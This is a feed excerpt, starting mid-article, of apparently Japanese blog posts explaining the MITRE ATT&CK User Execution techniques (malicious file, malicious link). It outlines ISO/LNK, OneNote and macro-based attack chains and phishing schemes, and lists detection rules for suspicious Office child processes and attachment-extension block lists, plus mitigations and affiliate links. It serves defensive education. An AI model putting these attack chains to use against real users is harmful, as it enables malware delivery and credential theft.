<li>ユーザーがISOをダブルクリックするとWindowsが仮想ドライブとしてマウント</li>
<li>仮想ドライブ内のLNKショートカットをユーザーがクリック</li>
<li>LNKが<a href="https://ai-sec-review.com/mitre-attck-t1059-003-windows-command-shell/">cmd.exe（T1059.003）</a>またはregsvr32.exeを起動してDLLを実行</li>
</ol>



<p>ISOファイル内のファイルにはMark of the Web（MOTW）が付与されないため、SmartScreenによる警告を回避できる点が攻撃者にとっての利点でした（Microsoftは後にこの問題を修正）。</p>



<h3 class="wp-block-heading">OneNote添付ファイル攻撃</h3>



<p>2023年以降、OneNote（.one）ファイルを使った攻撃が急増しました。OneNoteファイル内にスクリプトやバッチファイルを埋め込み、「Double click to view document」等のボタンに偽装して実行させます。OneNoteはマクロブロックの対象外であったため、マクロの代替手段として注目されました。</p>



<h2 class="wp-block-heading">検出方法</h2>



<h3 class="wp-block-heading">メールゲートウェイ</h3>



<ul class="wp-block-list">
<li><strong>添付ファイルのサンドボックス解析</strong>: Office文書、PDF、ISO/IMG、OneNoteファイルを動的解析し、マクロ実行や外部通信を検出</li>
<li><strong>危険な拡張子のブロック</strong>: .exe、.scr、.js、.vbs、.iso、.img、.one等の危険な添付ファイルをポリシーでブロック</li>
<li><strong>パスワード付きZIPの制限</strong>: サンドボックスを回避するためのパスワード付き添付を追加検査対象に</li>
</ul>



<h3 class="wp-block-heading">エンドポイント監視</h3>



<ul class="wp-block-list">
<li><strong>Officeプロセスの子プロセス監視</strong>（Sysmon Event ID 1）: <code>WINWORD.EXE</code>/<code>EXCEL.EXE</code>/<code>ONENOTE.EXE</code>から<code>cmd.exe</code>、<code>powershell.exe</code>、<code>wscript.exe</code>、<code>mshta.exe</code>等が起動された場合は高確度アラート</li>
<li><strong>ISOマウントの監視</strong>: <code>explorer.exe</code>によるISOマウント後のLNK実行チェーンを検出</li>
<li><strong>Mark of the Web（MOTW）の確認</strong>: Zone.Identifier ADS（代替データストリーム）の有無を確認し、MOTW回避の試みを検出</li>
</ul>



<h3 class="wp-block-heading">Windowsイベントログ</h3>



<ul class="wp-block-list">
<li><strong>Sysmon Event ID 1</strong>: プロセス生成（親プロセスがOfficeアプリケーション）</li>
<li><strong>Sysmon Event ID 11</strong>: ダウンロードフォルダ/Tempフォルダへのファイル作成</li>
<li><strong>Sysmon Event ID 15</strong>: ダウンロードされたファイルのADS（Zone.Identifier）作成</li>
<li><strong>Event ID 4688</strong>: コマンドライン引数付きプロセス生成の監査</li>
</ul>



<h2 class="wp-block-heading">緩和策（Mitigations）</h2>



<figure class="wp-block-table"><table><thead><tr><th>ID</th><th>緩和策名</th><th>概要</th></tr></thead><tbody><tr><td>M1038</td><td>Execution Prevention</td><td>AppLocker/WDACで未承認ファイルの実行をブロック</td></tr><tr><td>M1040</td><td>Behavior Prevention on Endpoint</td><td>EDRでOfficeからの不審な子プロセス起動をブロック</td></tr><tr><td>M1017</td><td>User Training</td><td>不審な添付ファイルの識別と報告手順を定期訓練で教育</td></tr><tr><td>M1031</td><td>Network Intrusion Prevention</td><td>メールゲートウェイで危険な添付ファイルをフィルタリング</td></tr><tr><td>M1042</td><td>Disable or Remove Feature or Program</td><td>Officeマクロの無効化（インターネット取得ファイル）、不要なスクリプトエンジンの無効化</td></tr></tbody></table></figure>



<h3 class="wp-block-heading">実務での推奨対策</h3>



<ul class="wp-block-list">
<li><strong>Officeマクロの全社ブロック</strong>: グループポリシーでインターネットからダウンロードされたOfficeファイルのマクロをブロック（Microsoft推奨設定）</li>
<li><strong>ASR（Attack Surface Reduction）ルール</strong>: Microsoft Defender ASRルールで「Officeアプリケーションによる子プロセスの作成をブロック」を有効化</li>
<li><strong>危険なファイル拡張子のブロック</strong>: メールゲートウェイで.iso、.img、.vhd、.one、.exe、.scr等を添付ブロック</li>
<li><strong>AppLocker/WDAC</strong>: ダウンロードフォルダ、Tempフォルダ、ユーザープロファイルフォルダからの実行ファイル起動をブロック</li>
<li><strong>定期的なフィッシング訓練</strong>: 添付ファイル型のフィッシングシミュレーションを四半期ごとに実施</li>
</ul>



<h2 class="wp-block-heading">関連するSub-techniques</h2>



<p>T1204.002は<a href="https://ai-sec-review.com/mitre-attck-t1204-user-execution/">T1204 User Execution</a>のSub-techniqueです。同じ親テクニックに属する他の手法：</p>



<ul class="wp-block-list">
<li><a href="https://ai-sec-review.com/mitre-attck-t1204-001-malicious-link/">T1204.001 — Malicious Link</a>: 悪意あるリンクをクリックさせる手法</li>
<li><strong>T1204.003 — Malicious Image</strong>: 悪意あるコンテナイメージ等を実行させる手法</li>
</ul>



<h3 class="wp-block-heading">攻撃チェーンにおける関連テクニック</h3>



<ul class="wp-block-list">
<li><strong>T1566.001（Spearphishing Attachment）</strong>: 悪意あるファイルをメールで配信（Initial Access）</li>
<li><strong><a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059（Command and Scripting Interpreter）</a></strong>: ファイル実行後に<a href="https://ai-sec-review.com/mitre-attck-t1059-001-powershell/">PowerShell</a>やVBAがコマンドを実行</li>
</ul>



<h2 class="wp-block-heading">おすすめセキュリティ対策ツール</h2>



<p>本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow"><p><strong>🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入</strong><br>攻撃者が悪意あるファイルを使用する場合、リアルタイムスキャンと振る舞い検知を持つエンドポイント保護が有効な緩和策となります。</p></blockquote>



<ul class="wp-block-list">
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+22F7EA+4OQ4+5YRHE"><strong>ESET（イーセット）</strong></a> ※PR — 軽量・企業向け実績あり</li>
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+23M2LU+5AZU+61Z81"><strong>ウイルスバスター</strong></a> ※PR — 日本語サポート充実・国産</li>
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+230N02+3VKO+5YRHE"><strong>Norton（ノートン）</strong></a> ※PR — 世界最大手・VPN機能付き</li>
</ul>



<p>※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。</p>



<h2 class="wp-block-heading">まとめ</h2>



<ul class="wp-block-list">
<li>T1204.002 Malicious Fileは、悪意あるファイルをユーザーに開かせて実行させる手法であり、最も一般的な初期侵入パターンの一つ</li>
<li>Office文書マクロからISO/LNK/OneNoteなどマクロに依存しない手法に攻撃トレンドが移行している</li>
<li>Officeマクロブロック、ASRルール、AppLocker/WDAC、危険な拡張子のメールフィルタリングが有効な対策</li>
<li>Sysmonによるプロセス監視で、Officeプロセスからの不審な子プロセス起動を検出できる</li>
</ul>



<h2 class="wp-block-heading">参考文献</h2>



<ul class="wp-block-list">
<li><a rel="noopener" href="https://attack.mitre.org/techniques/T1204/002/" target="_blank">MITRE ATT&#038;CK — T1204.002 Malicious File</a></li>
<li><a rel="noopener" href="https://www.ipa.go.jp/security/" target="_blank">IPA（情報処理推進機構）セキュリティセンター</a></li>
<li><a rel="noopener" href="https://attack.mitre.org/" target="_blank">MITRE ATT&#038;CK公式サイト</a></li>
</ul>



<p><em>Based on MITRE ATT&#038;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.<br>本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイト（<a rel="noopener" href="https://attack.mitre.org/" target="_blank">https://attack.mitre.org/</a>）をご参照ください。</em></p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1204-002-malicious-file/">T1204.002 Malicious Fileとは？MITRE ATT&#038;CK日本語解説</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/mitre-attck-t1204-002-malicious-file/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>T1204.001 Malicious Linkとは？MITRE ATT&#038;CK日本語解説</title>
		<link>https://ai-sec-review.com/mitre-attck-t1204-001-malicious-link/</link>
					<comments>https://ai-sec-review.com/mitre-attck-t1204-001-malicious-link/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 20:18:49 +0000</pubDate>
				<category><![CDATA[5]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/?p=2072</guid>

					<description><![CDATA[<p>※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。 フィッシングメールやSNSメッセージに含まれる悪意あるリンクをクリックしてしまう——これはサイバー攻撃で最も一 [&#8230;]</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1204-001-malicious-link/">T1204.001 Malicious Linkとは？MITRE ATT&#038;CK日本語解説</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>※本記事にはアフィリエイトリンクが含まれます。詳しくは<a href="https://ai-sec-review.com/disclosure/">プライバシーポリシー・広告掲載について</a>をご覧ください。</p>



<p>フィッシングメールやSNSメッセージに含まれる悪意あるリンクをクリックしてしまう——これはサイバー攻撃で最も一般的な侵入経路の一つです。MITRE ATT&#038;CKでは<strong>T1204.001 Malicious Link</strong>として分類されており、あらゆる規模の攻撃で利用されています。本記事では、悪意あるリンクの手口、実際の攻撃事例、検出方法と対策を日本語で詳しく解説します。</p>



<p><em>※本サイトはMITRE ATT&#038;CK®の非公式日本語解説サイトです。Based on MITRE ATT&#038;CK® v16。</em></p>



<h2 class="wp-block-heading">ATT&#038;CK情報</h2>



<figure class="wp-block-table"><table><tbody><tr><td><strong>ATT&#038;CK ID</strong></td><td>T1204.001</td></tr><tr><td><strong>Tactic</strong></td><td>Execution（実行 / TA0002）</td></tr><tr><td><strong>対応バージョン</strong></td><td>ATT&#038;CK v16</td></tr><tr><td><strong>対応プラットフォーム</strong></td><td>Windows / macOS / Linux</td></tr><tr><td><strong>親テクニック</strong></td><td><a href="https://ai-sec-review.com/mitre-attck-t1204-user-execution/">T1204 User Execution</a></td></tr></tbody></table></figure>



<h2 class="wp-block-heading">概要</h2>



<p>T1204.001は、<strong><a href="https://ai-sec-review.com/mitre-attck-t1204-user-execution/">T1204 User Execution</a></strong>のSub-techniqueです。攻撃者はソーシャルエンジニアリングを使って、ユーザーに悪意あるリンクをクリックさせます。リンク先では、マルウェアのダウンロード、認証情報の窃取ページへの誘導、ブラウザエクスプロイトの実行など、さまざまな攻撃が行われます。</p>



<p>悪意あるリンクは、フィッシングメール（T1566.002 Spearphishing Link）、SNSメッセージ、Webサイト上の広告、QRコード（クイッシング）、SMS（スミッシング）など多様な経路で配信されます。攻撃者はURL短縮サービス、オープンリダイレクト、正規ドメインの悪用、ホモグラフ攻撃（見た目が似た文字の使用）など、リンクの正当性を偽装する技術を駆使します。</p>



<p>日本国内でも、Amazonやヤマト運輸、銀行を騙るフィッシングリンクが大量に流通しており、<a rel="noopener" href="https://www.ipa.go.jp/security/" target="_blank">IPA（情報処理推進機構）</a>への相談件数は年々増加傾向にあります。</p>



<h2 class="wp-block-heading">攻撃シナリオ例</h2>



<h3 class="wp-block-heading">APT28（Fancy Bear）— OAuth認証情報の窃取</h3>



<p>ロシア系のAPT28は、Google/Microsoftのログインページを精巧に模倣したフィッシングサイトへのリンクを標的型メールで配信します。リンクをクリックしたユーザーは正規のログインページと区別できないサイトに誘導され、OAuth認証情報を入力してしまいます。窃取された認証情報はメールの閲覧・クラウドデータへのアクセスに利用されます。</p>



<h3 class="wp-block-heading">国内事例 — ECサイト・宅配便を装うフィッシング</h3>



<p>日本では以下のパターンが頻出しています：</p>



<ul class="wp-block-list">
<li><strong>Amazon/楽天を装うメール</strong>: 「アカウントが停止されました」等の緊急メッセージで偽ログインページへ誘導し、クレジットカード情報を窃取</li>
<li><strong>宅配便不在通知SMS（スミッシング）</strong>: 「お荷物をお届けできませんでした」というSMSのリンクから偽サイトへ誘導し、マルウェアをインストールまたは認証情報を窃取</li>
<li><strong>QRコード（クイッシング）</strong>: 偽の駐車場料金支払いQRコードや、正規ポスターに貼り付けた偽QRコードで悪意あるサイトへ誘導</li>
</ul>



<h3 class="wp-block-heading">ドライブバイダウンロード</h3>



<p>攻撃者は悪意あるリンクの先に、ブラウザの脆弱性を突くエクスプロイトキットを仕込んだサイトを配置します。ユーザーがリンクをクリックしてページを表示するだけで、バックグラウンドでマルウェアがダウンロード・実行されます。この手法ではユーザーの追加操作が不要なため、特に危険度が高くなります。</p>



<h2 class="wp-block-heading">検出方法</h2>



<h3 class="wp-block-heading">メールセキュリティ</h3>



<ul class="wp-block-list">
<li><strong>URLレピュテーション検査</strong>: メール内のURLをリアルタイムで脅威インテリジェンスDBと照合</li>
<li><strong>リンク書き換え（URL Rewriting）</strong>: メール内リンクをセキュリティゲートウェイ経由に書き換え、クリック時にリアルタイム検査</li>
<li><strong>送信元認証（SPF/DKIM/DMARC）</strong>: なりすましメールの検出</li>
</ul>



<h3 class="wp-block-heading">Webプロキシ・DNS</h3>



<ul class="wp-block-list">
<li><strong>Webフィルタリング</strong>: カテゴリベースのURLフィルタリングで未分類・新規ドメインへのアクセスを制限</li>
<li><strong>DNS Sinkhole</strong>: 既知のフィッシングドメインをDNSレベルでブロック</li>
<li><strong>SSL/TLS検査</strong>: HTTPS通信の中身を検査し、暗号化された悪意ある通信を検出</li>
</ul>



<h3 class="wp-block-heading">エンドポイント監視</h3>



<ul class="wp-block-list">
<li><strong>ブラウザからの不審なプロセス起動</strong>: ブラウザプロセス→ダウンロード→実行のチェーンを監視</li>
<li><strong>ダウンロードフォルダの監視</strong>: 実行ファイル（.exe, .msi, .js, .vbs等）のダウンロード後即時実行を検知</li>
</ul>



<h2 class="wp-block-heading">緩和策（Mitigations）</h2>



<figure class="wp-block-table"><table><thead><tr><th>ID</th><th>緩和策名</th><th>概要</th></tr></thead><tbody><tr><td>M1031</td><td>Network Intrusion Prevention</td><td>メールゲートウェイ・Webプロキシでフィッシングリンクをブロック</td></tr><tr><td>M1017</td><td>User Training</td><td>フィッシングリンクの見分け方と報告手順を定期訓練で教育</td></tr><tr><td>M1021</td><td>Restrict Web-Based Content</td><td>Webフィルタリングで未分類・新規ドメインへのアクセスを制限</td></tr><tr><td>M1047</td><td>Audit</td><td>メール内リンクのクリック率を定期的に監査し、訓練効果を測定</td></tr></tbody></table></figure>



<h3 class="wp-block-heading">実務での推奨対策</h3>



<ul class="wp-block-list">
<li><strong>メールリンク書き換え</strong>: Microsoft Defender for Office 365のSafe Links、Proofpoint URL Defenseなどを導入し、クリック時にリアルタイムURL検査を実施</li>
<li><strong>多要素認証（MFA）の必須化</strong>: フィッシングで認証情報が窃取されても、MFAにより不正ログインを防止</li>
<li><strong>FIDO2/パスキーの導入</strong>: フィッシング耐性のある認証方式の導入を検討（フィッシングサイトでは認証が成立しない）</li>
<li><strong>定期的なフィッシング訓練</strong>: GoPhish等のツールで定期的にフィッシングシミュレーションを実施</li>
<li><strong>報告文化の醸成</strong>: 不審なメールの報告ボタン（Outlookアドイン等）を設置し、報告を評価する文化を作る</li>
</ul>



<h2 class="wp-block-heading">関連するSub-techniques</h2>



<p>T1204.001は<a href="https://ai-sec-review.com/mitre-attck-t1204-user-execution/">T1204 User Execution</a>のSub-techniqueです。同じ親テクニックに属する他の手法：</p>



<ul class="wp-block-list">
<li><strong>T1204.002 — Malicious File</strong>: 悪意あるファイルを開かせて実行させる手法</li>
<li><strong>T1204.003 — Malicious Image</strong>: 悪意あるコンテナイメージ等を実行させる手法</li>
</ul>



<h3 class="wp-block-heading">攻撃チェーンにおける関連テクニック</h3>



<ul class="wp-block-list">
<li><strong>T1566.002（Spearphishing Link）</strong>: メール経由で悪意あるリンクを配信する手法（Initial Access）</li>
<li><strong><a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059（Command and Scripting Interpreter）</a></strong>: リンク経由でダウンロードされたペイロードがスクリプトを実行</li>
</ul>



<h2 class="wp-block-heading">おすすめセキュリティ対策ツール</h2>



<p>本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow"><p><strong>🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入</strong><br>攻撃者が悪意あるリンクを使用する場合、Webフィルタリング機能を持つエンドポイント保護が有効な緩和策となります。</p></blockquote>



<ul class="wp-block-list">
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+22F7EA+4OQ4+5YRHE"><strong>ESET（イーセット）</strong></a> ※PR — 軽量・企業向け実績あり</li>
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+23M2LU+5AZU+61Z81"><strong>ウイルスバスター</strong></a> ※PR — 日本語サポート充実・国産</li>
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+230N02+3VKO+5YRHE"><strong>Norton（ノートン）</strong></a> ※PR — 世界最大手・VPN機能付き</li>
</ul>



<p>※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。</p>



<h2 class="wp-block-heading">まとめ</h2>



<ul class="wp-block-list">
<li>T1204.001 Malicious Linkは、悪意あるリンクをクリックさせてマルウェア実行や認証情報窃取を行う手法である</li>
<li>フィッシングメール、SMS、QRコードなど多様な配信経路があり、URL偽装技術も高度化している</li>
<li>メールリンク書き換え、Webフィルタリング、MFA必須化が有効な技術的対策</li>
<li>定期的なフィッシング訓練と報告文化の醸成が、組織全体の耐性を高める</li>
</ul>



<h2 class="wp-block-heading">参考文献</h2>



<ul class="wp-block-list">
<li><a rel="noopener" href="https://attack.mitre.org/techniques/T1204/001/" target="_blank">MITRE ATT&#038;CK — T1204.001 Malicious Link</a></li>
<li><a rel="noopener" href="https://www.ipa.go.jp/security/" target="_blank">IPA（情報処理推進機構）セキュリティセンター</a></li>
<li><a rel="noopener" href="https://attack.mitre.org/" target="_blank">MITRE ATT&#038;CK公式サイト</a></li>
</ul>



<p><em>Based on MITRE ATT&#038;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.<br>本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイト（<a rel="noopener" href="https://attack.mitre.org/" target="_blank">https://attack.mitre.org/</a>）をご参照ください。</em></p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1204-001-malicious-link/">T1204.001 Malicious Linkとは？MITRE ATT&#038;CK日本語解説</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/mitre-attck-t1204-001-malicious-link/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>T1204 User Executionとは？MITRE ATT&#038;CK日本語解説</title>
		<link>https://ai-sec-review.com/mitre-attck-t1204-user-execution/</link>
					<comments>https://ai-sec-review.com/mitre-attck-t1204-user-execution/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 20:18:45 +0000</pubDate>
				<category><![CDATA[5]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/?p=2071</guid>

					<description><![CDATA[<p>※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。 サイバー攻撃の多くは、最終的にユーザー自身の操作によってマルウェアが実行されます。MITRE ATT&#038 [&#8230;]</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1204-user-execution/">T1204 User Executionとは？MITRE ATT&#038;CK日本語解説</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>※本記事にはアフィリエイトリンクが含まれます。詳しくは<a href="https://ai-sec-review.com/disclosure/">プライバシーポリシー・広告掲載について</a>をご覧ください。</p>



<p>サイバー攻撃の多くは、最終的にユーザー自身の操作によってマルウェアが実行されます。MITRE ATT&#038;CKでは<strong>T1204 User Execution</strong>として、攻撃者がユーザーの操作に依存してコードを実行させる手法を体系化しています。フィッシングメールの添付ファイルを開く、悪意あるリンクをクリックする——これらは全てUser Executionに分類されます。本記事では、この手法の全体像、Sub-technique、検出方法と緩和策を日本語で詳しく解説します。</p>



<p><em>※本サイトはMITRE ATT&#038;CK®の非公式日本語解説サイトです。Based on MITRE ATT&#038;CK® v16。</em></p>



<h2 class="wp-block-heading">ATT&#038;CK情報</h2>



<figure class="wp-block-table"><table><tbody><tr><td><strong>ATT&#038;CK ID</strong></td><td>T1204</td></tr><tr><td><strong>Tactic</strong></td><td>Execution（実行 / TA0002）</td></tr><tr><td><strong>対応バージョン</strong></td><td>ATT&#038;CK v16</td></tr><tr><td><strong>対応プラットフォーム</strong></td><td>Windows / macOS / Linux</td></tr><tr><td><strong>Sub-techniques</strong></td><td>T1204.001 Malicious Link / T1204.002 Malicious File / T1204.003 Malicious Image</td></tr></tbody></table></figure>



<h2 class="wp-block-heading">概要</h2>



<p>T1204 User Executionは、<strong>Execution（実行 / TA0002）</strong>タクティクスに属するテクニックです。このテクニックは、攻撃者が悪意あるコードをユーザー自身に実行させることを指します。技術的なエクスプロイトとは異なり、ソーシャルエンジニアリングによってユーザーの信頼や不注意を利用する点が特徴です。</p>



<p>User Executionは多くの攻撃チェーンで<strong>Initial Access（初期侵入）からExecution（実行）への橋渡し</strong>として機能します。典型的なパターンは、T1566（Phishing）で配信されたメールに含まれる悪意あるリンクやファイルを、ユーザーがクリック・実行するというものです。</p>



<p>攻撃者はユーザーの操作を誘導するために、業務に関連する内容を装ったメール、緊急性を煽るメッセージ、信頼できる送信元の偽装など、さまざまなソーシャルエンジニアリング手法を組み合わせます。</p>



<h2 class="wp-block-heading">攻撃シナリオ例</h2>



<h3 class="wp-block-heading">Emotet — 大規模フィッシング経由のUser Execution</h3>



<p>Emotetは、世界的に最も広く拡散したマルウェアの一つであり、User Executionを攻撃チェーンの中核に位置付けています。</p>



<ol class="wp-block-list">
<li><strong>T1566.001（Spearphishing Attachment）</strong>: 業務メールに見せかけたメールにWord/Excelファイルを添付</li>
<li><strong>T1204.002（Malicious File）</strong>: ユーザーがファイルを開き、「コンテンツの有効化」をクリック</li>
<li><strong><a href="https://ai-sec-review.com/?p=1998">T1059.005（Visual Basic）</a></strong>: VBAマクロが実行され、<a href="https://ai-sec-review.com/mitre-attck-t1059-001-powershell/">PowerShell</a>を起動</li>
<li>C2サーバーからEmotet本体をダウンロード・実行</li>
</ol>



<p>このチェーンは、ユーザーが「ファイルを開く」「マクロを有効にする」という2つの操作を行うことで成立します。</p>



<h3 class="wp-block-heading">APT29 — 標的型攻撃でのUser Execution</h3>



<p>APT29（Cozy Bear）は、標的組織の業務内容を詳細に調査した上で、極めて精巧なフィッシングメールを送信します。受信者は業務上必要な文書と判断してファイルを開くため、User Executionの成功率が非常に高くなります。外交文書や政策レポートを装ったPDFやLNKファイルが頻繁に使用されています。</p>



<h3 class="wp-block-heading">BEC（ビジネスメール詐欺）との組み合わせ</h3>



<p>日本国内でも被害が急増しているBEC（Business Email Compromise）攻撃では、経営者や取引先を装ったメールで添付ファイルの確認やリンクのクリックを指示します。IPA「<a rel="noopener" href="https://www.ipa.go.jp/security/10threats/10threats2026.html" target="_blank">情報セキュリティ10大脅威 2026</a>」でも、フィッシング・BEC関連の脅威が上位にランクインしています。</p>



<h2 class="wp-block-heading">検出方法</h2>



<h3 class="wp-block-heading">メールゲートウェイ</h3>



<ul class="wp-block-list">
<li><strong>添付ファイルのサンドボックス分析</strong>: Office文書、PDF、実行ファイルをサンドボックスで動的解析し、マクロ実行や外部通信の有無を確認</li>
<li><strong>URLレピュテーション</strong>: メール本文・添付ファイル内のURLをレピュテーションサービスで検査</li>
<li><strong>送信元認証</strong>: SPF、DKIM、DMARCの検証結果を確認し、送信元偽装を検出</li>
</ul>



<h3 class="wp-block-heading">エンドポイント監視</h3>



<ul class="wp-block-list">
<li><strong>Officeプロセスからの子プロセス生成</strong>（Windows）: <code>WINWORD.EXE</code>→<code>cmd.exe</code>/<code>powershell.exe</code>のプロセスチェーンはUser Executionの典型的指標（Sysmon Event ID 1）</li>
<li><strong>ファイルダウンロード後の実行</strong>: ブラウザのダウンロードディレクトリから直接実行されたファイルを監視</li>
<li><strong>マクロ実行の監視</strong>: Officeアプリケーションの保護ビュー解除やマクロ有効化のイベントを記録</li>
</ul>



<h3 class="wp-block-heading">Windowsイベントログ</h3>



<ul class="wp-block-list">
<li><strong>Sysmon Event ID 1</strong>（Process Creation）: Officeプロセスからの子プロセス起動を検出</li>
<li><strong>Sysmon Event ID 11</strong>（File Created）: ダウンロードフォルダやTempフォルダへの不審なファイル作成を検出</li>
<li><strong>Event ID 4688</strong>（Process Creation with Audit Policy）: コマンドライン引数付きのプロセス作成を記録</li>
</ul>



<h2 class="wp-block-heading">緩和策（Mitigations）</h2>



<figure class="wp-block-table"><table><thead><tr><th>ID</th><th>緩和策名</th><th>概要</th></tr></thead><tbody><tr><td>M1038</td><td>Execution Prevention</td><td>AppLocker/WDACで未承認の実行ファイルをブロック</td></tr><tr><td>M1031</td><td>Network Intrusion Prevention</td><td>メールゲートウェイで悪意ある添付ファイル・URLをフィルタリング</td></tr><tr><td>M1017</td><td>User Training</td><td>フィッシング訓練によるセキュリティ意識向上</td></tr><tr><td>M1021</td><td>Restrict Web-Based Content</td><td>Webフィルタリングで悪意あるサイトへのアクセスをブロック</td></tr><tr><td>M1040</td><td>Behavior Prevention on Endpoint</td><td>EDRの振る舞い検知でマクロからの不審な子プロセス生成をブロック</td></tr></tbody></table></figure>



<h3 class="wp-block-heading">実務での推奨対策</h3>



<ul class="wp-block-list">
<li><strong>Officeマクロの制限</strong>: グループポリシーでインターネットからダウンロードされたOfficeファイルのマクロ実行を無効化（Mark of the Web + マクロブロック）</li>
<li><strong>定期的なフィッシング訓練</strong>: 四半期ごとにフィッシングシミュレーションを実施し、クリック率を計測・改善</li>
<li><strong>メール添付ファイルの自動サンドボックス</strong>: Microsoft Defender for Office 365やProofpoint等のサンドボックス機能を有効化</li>
<li><strong>AppLocker/WDACの導入</strong>: ダウンロードフォルダやTempフォルダからの実行ファイル起動をブロック</li>
<li><strong>SPF/DKIM/DMARC</strong>: メール送信元認証を厳格に設定し、なりすましメールを検出</li>
</ul>



<h2 class="wp-block-heading">関連するSub-techniques</h2>



<p>T1204 User Executionには以下のSub-techniqueがあります：</p>



<ul class="wp-block-list">
<li><strong>T1204.001 — Malicious Link</strong>: 悪意あるリンクをクリックさせてマルウェアをダウンロード・実行させる手法</li>
<li><strong>T1204.002 — Malicious File</strong>: 悪意あるファイル（Office文書、PDF、実行ファイル等）を開かせて実行させる手法</li>
<li><strong>T1204.003 — Malicious Image</strong>: 悪意あるコンテナイメージ等を実行させる手法</li>
</ul>



<h3 class="wp-block-heading">攻撃チェーンにおける関連テクニック</h3>



<ul class="wp-block-list">
<li><strong>T1566（Phishing）</strong>: User Executionの前段階としてフィッシングメールが配信される</li>
<li><strong><a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059（Command and Scripting Interpreter）</a></strong>: User Execution後に<a href="https://ai-sec-review.com/mitre-attck-t1059-001-powershell/">PowerShell</a>や<a href="https://ai-sec-review.com/?p=1998">VBA</a>等のスクリプトが実行される</li>
</ul>



<h2 class="wp-block-heading">おすすめセキュリティ対策ツール</h2>



<p>本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow"><p><strong>🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入</strong><br>攻撃者がUser Executionを使用する場合、メールフィルタリングとエンドポイント保護の組み合わせが有効な緩和策となります。</p></blockquote>



<ul class="wp-block-list">
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+22F7EA+4OQ4+5YRHE"><strong>ESET（イーセット）</strong></a> ※PR — 軽量・企業向け実績あり</li>
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+23M2LU+5AZU+61Z81"><strong>ウイルスバスター</strong></a> ※PR — 日本語サポート充実・国産</li>
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+230N02+3VKO+5YRHE"><strong>Norton（ノートン）</strong></a> ※PR — 世界最大手・VPN機能付き</li>
</ul>



<p>※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。</p>



<h2 class="wp-block-heading">まとめ</h2>



<ul class="wp-block-list">
<li>T1204 User Executionは、ソーシャルエンジニアリングによりユーザー自身にマルウェアを実行させる手法である</li>
<li>フィッシングメール→ファイル/リンク→実行という攻撃チェーンが最も一般的なパターン</li>
<li>Officeマクロの制限、メールサンドボックス、フィッシング訓練が有効な緩和策</li>
<li>技術的対策とユーザー教育の両面からアプローチすることが重要</li>
</ul>



<h2 class="wp-block-heading">参考文献</h2>



<ul class="wp-block-list">
<li><a rel="noopener" href="https://attack.mitre.org/techniques/T1204/" target="_blank">MITRE ATT&#038;CK — T1204 User Execution</a></li>
<li><a rel="noopener" href="https://www.ipa.go.jp/security/" target="_blank">IPA（情報処理推進機構）セキュリティセンター</a></li>
<li><a rel="noopener" href="https://attack.mitre.org/" target="_blank">MITRE ATT&#038;CK公式サイト</a></li>
</ul>



<p><em>Based on MITRE ATT&#038;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.<br>本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイト（<a rel="noopener" href="https://attack.mitre.org/" target="_blank">https://attack.mitre.org/</a>）をご参照ください。</em></p>
